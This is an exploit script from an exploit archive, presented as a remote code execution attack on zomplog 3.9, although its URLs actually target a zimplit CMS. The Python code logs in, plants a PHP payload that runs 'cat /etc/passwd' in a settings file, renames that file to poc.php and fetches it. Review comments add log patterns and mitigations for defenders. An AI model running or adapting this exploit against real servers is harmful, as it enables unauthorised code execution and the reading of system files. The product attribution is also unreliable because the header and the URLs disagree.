## https://sploitus.com/exploit?id=PACKETSTORM:173806
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog
#Version: v3.9
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
# Proof-of-concept flow, as written on this page: log in, overwrite
# Zsettings.js through the saveE action, rename that file to poc.php, then
# request it so the server treats it as PHP.
# NOTE(review): the header names zomplog 3.9, but every URL below targets
# zimplit.php under /zimplitcms/ -- confirm the affected product before
# using this advisory for triage.
# Defensive reading: the script authenticates first, then depends on a
# rename action that accepts a .php target name. Mitigations to check on a
# deployment are an extension allow-list in the save/rename handlers and a
# web server that does not execute PHP from the editable content directory.
# In access logs, a saveE request for Zsettings.js followed by
# action=rename with a newname ending in .php is the pattern this script
# produces.

# Credentials are read interactively; both are echoed to the terminal.
username = input('username: ')
password = input('password: ')

# Endpoints; all of them point at a local test instance.
login_url = "http://localhost/zimplitcms/zimplit.php?action=login"
payload_url = "http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url = "http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url = "http://localhost/zimplitcms/poc.php"

# Headers shared by both form posts.
pheaders = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
}
# The login request additionally carries the language cookie, sent first.
headers = {'Cookie': 'ZsessionLang=en', **pheaders}

# One session object so cookies set at login are reused by later requests.
session = requests.Session()

# The form body is assembled by hand; the credentials are inserted without
# URL-encoding.
login_data = f"lang=en&username={username}&password={password}&submit=Start!"
login_req = session.post(login_url, headers=headers, data=login_data)

# NOTE(review): only the HTTP status is inspected. Whether the application
# answers a rejected login with a non-200 status is not visible here.
if login_req.status_code != 200:
    print('Login promlem.')
    exit()
print('Login OK')

# The body is URL-encoded twice. Decoded, it assigns ZmaxpicZoomW a value
# containing a PHP tag that calls system('cat /etc/passwd'), followed by the
# ZmaxpicZoomH / ZmaxpicW / ZmaxpicH settings.
payload_data = "html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
payload_req = session.post(payload_url, headers=pheaders, data=payload_data)

# Ask the application to rename the settings file to a .php name.
rename_req = session.get(rename_url)

# Fetch the renamed file and show whatever the server returned for it.
poc_req = session.get(poc_url)
print(poc_req.text)
#youtube poc video - https://youtu.be/nn7hieGyCFs